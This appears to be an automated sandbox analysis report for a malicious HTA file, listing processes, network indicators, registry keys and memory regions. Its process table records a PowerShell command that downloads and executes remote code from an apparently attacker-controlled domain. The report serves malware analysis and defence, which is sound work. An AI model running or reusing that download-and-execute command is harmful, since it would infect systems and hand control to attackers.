Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
d.hta
|
HTML document, ASCII text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_55is5ui4.y0s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_spihcels.1yr.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\SysWOW64\mshta.exe
|
mshta.exe "C:\Users\user\Desktop\d.hta"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Invoke-Expression (irm -Uri 'iapartmentlistings.com/tykhwuxk')
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://iapartmentlistings.com/tykhwuxk
|
91.222.173.38
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
iapartmentlistings.com
|
91.222.173.38
|
|
|
|
15.164.165.52.in-addr.arpa
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
91.222.173.38
|
iapartmentlistings.com
|
Ukraine
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7AA4000
|
heap
|
page read and write
|
||
|
2F45000
|
heap
|
page read and write
|
||
|
2E70000
|
trusted library allocation
|
page read and write
|
||
|
2F3D000
|
heap
|
page read and write
|
||
|
2D57000
|
stack
|
page read and write
|
||
|
2F7F000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
2F1B000
|
heap
|
page read and write
|
||
|
563B000
|
stack
|
page read and write
|
||
|
2F9C000
|
heap
|
page read and write
|
||
|
2F61000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F53000
|
heap
|
page read and write
|
||
|
2F96000
|
heap
|
page read and write
|
||
|
9D0000
|
heap
|
page read and write
|
||
|
BAEB000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2FA6000
|
heap
|
page read and write
|
||
|
2ECE000
|
heap
|
page read and write
|
||
|
7A9B000
|
heap
|
page read and write
|
||
|
7A9C000
|
heap
|
page read and write
|
||
|
7A88000
|
heap
|
page read and write
|
||
|
2EF8000
|
heap
|
page read and write
|
||
|
90A000
|
stack
|
page read and write
|
||
|
9C5000
|
heap
|
page read and write
|
||
|
64F0000
|
heap
|
page read and write
|
||
|
7A88000
|
heap
|
page read and write
|
||
|
2FA2000
|
heap
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
2F09000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
7A9B000
|
heap
|
page read and write
|
||
|
7A61000
|
heap
|
page read and write
|
||
|
2F56000
|
heap
|
page read and write
|
||
|
7AA3000
|
heap
|
page read and write
|
||
|
2F51000
|
heap
|
page read and write
|
||
|
C40000
|
trusted library allocation
|
page read and write
|
||
|
64FD000
|
heap
|
page read and write
|
||
|
2F66000
|
heap
|
page read and write
|
||
|
2F7D000
|
heap
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F59000
|
heap
|
page read and write
|
||
|
3300000
|
heap
|
page read and write
|
||
|
2F71000
|
heap
|
page read and write
|
||
|
2F45000
|
heap
|
page read and write
|
||
|
7A62000
|
heap
|
page read and write
|
||
|
2F56000
|
heap
|
page read and write
|
||
|
2F5D000
|
heap
|
page read and write
|
||
|
B934000
|
trusted library allocation
|
page read and write
|
||
|
7A9B000
|
heap
|
page read and write
|
||
|
2F09000
|
heap
|
page read and write
|
||
|
7A63000
|
heap
|
page read and write
|
||
|
5150000
|
heap
|
page read and write
|
||
|
4E60000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
2EFD000
|
heap
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
577E000
|
stack
|
page read and write
|
||
|
31B4000
|
heap
|
page read and write
|
||
|
2EFE000
|
heap
|
page read and write
|
||
|
662E000
|
stack
|
page read and write
|
||
|
2EB0000
|
heap
|
page read and write
|
||
|
2F5D000
|
heap
|
page read and write
|
||
|
7A86000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
B9B0000
|
heap
|
page read and write
|
||
|
B930000
|
trusted library allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
5174000
|
heap
|
page read and write
|
||
|
2FA6000
|
heap
|
page read and write
|
||
|
672F000
|
stack
|
page read and write
|
||
|
7AB0000
|
heap
|
page read and write
|
||
|
7A9B000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
4F43000
|
heap
|
page read and write
|
||
|
2F5D000
|
heap
|
page read and write
|
||
|
59BF000
|
stack
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F65000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
2F66000
|
heap
|
page read and write
|
||
|
651C000
|
heap
|
page read and write
|
||
|
651B000
|
heap
|
page read and write
|
||
|
31B0000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
58BE000
|
stack
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2F82000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2F85000
|
heap
|
page read and write
|
||
|
7A86000
|
heap
|
page read and write
|
||
|
2F56000
|
heap
|
page read and write
|
||
|
7A73000
|
heap
|
page read and write
|
||
|
2FA6000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
2F66000
|
heap
|
page read and write
|
||
|
2F13000
|
heap
|
page read and write
|
||
|
5170000
|
heap
|
page read and write
|
||
|
2F32000
|
heap
|
page read and write
|
||
|
2F8E000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
7A9C000
|
heap
|
page read and write
|
||
|
54BF000
|
stack
|
page read and write
|
||
|
30AE000
|
stack
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
2F90000
|
heap
|
page read and write
|
||
|
BBEC000
|
stack
|
page read and write
|
||
|
6508000
|
heap
|
page read and write
|
||
|
7AA3000
|
heap
|
page read and write
|
||
|
2F49000
|
heap
|
page read and write
|
||
|
2F9A000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
B502000
|
trusted library allocation
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
2F51000
|
heap
|
page read and write
|
||
|
2FA2000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
2F5A000
|
heap
|
page read and write
|
||
|
2F71000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
5A40000
|
trusted library allocation
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2F8C000
|
heap
|
page read and write
|
||
|
2F70000
|
heap
|
page read and write
|
||
|
2EF7000
|
heap
|
page read and write
|
||
|
2FA6000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
6523000
|
heap
|
page read and write
|
||
|
C3E000
|
stack
|
page read and write
|
||
|
2F51000
|
heap
|
page read and write
|
||
|
7AA3000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
2EA0000
|
heap
|
page read and write
|
||
|
2EF7000
|
heap
|
page read and write
|
||
|
2F7F000
|
heap
|
page read and write
|
||
|
6548000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
4F40000
|
heap
|
page read and write
|
||
|
2F15000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F91000
|
heap
|
page read and write
|
||
|
31AE000
|
stack
|
page read and write
|
||
|
9C0000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
2F5D000
|
heap
|
page read and write
|
||
|
587F000
|
stack
|
page read and write
|
||
|
2EB8000
|
heap
|
page read and write
|
||
|
2F88000
|
heap
|
page read and write
|
||
|
2F09000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
573E000
|
stack
|
page read and write
|
||
|
2F4B000
|
heap
|
page read and write
|
||
|
2E50000
|
heap
|
page read and write
|
||
|
2F09000
|
heap
|
page read and write
|
||
|
2EFE000
|
heap
|
page read and write
|
||
|
2F09000
|
heap
|
page read and write
|
||
|
3307000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
2F87000
|
heap
|
page read and write
|
||
|
2FA7000
|
heap
|
page read and write
|
||
|
2EF8000
|
heap
|
page read and write
|
||
|
2F74000
|
heap
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
2F65000
|
heap
|
page read and write
|
||
|
31B6000
|
heap
|
page read and write
|
||
|
2F60000
|
heap
|
page read and write
|
||
|
2F35000
|
heap
|
page read and write
|
||
|
9BD000
|
stack
|
page read and write
|
||
|
2F25000
|
heap
|
page read and write
|
||
|
2F58000
|
heap
|
page read and write
|
||
|
2F2D000
|
heap
|
page read and write
|
||
|
2F36000
|
heap
|
page read and write
|
||
|
2F84000
|
heap
|
page read and write
|
||
|
7AA3000
|
heap
|
page read and write
|
||
|
330A000
|
heap
|
page read and write
|
||
|
2F8A000
|
heap
|
page read and write
|
||
|
2F94000
|
heap
|
page read and write
|
||
|
31BF000
|
heap
|
page read and write
|
||
|
2F27000
|
heap
|
page read and write
|
||
|
7AAA000
|
heap
|
page read and write
|
||
|
2EE2000
|
heap
|
page read and write
|
||
|
7A60000
|
heap
|
page read and write
|
||
|
53BE000
|
stack
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
||
|
2F29000
|
heap
|
page read and write
|
There are 186 hidden memdumps, click here to show them.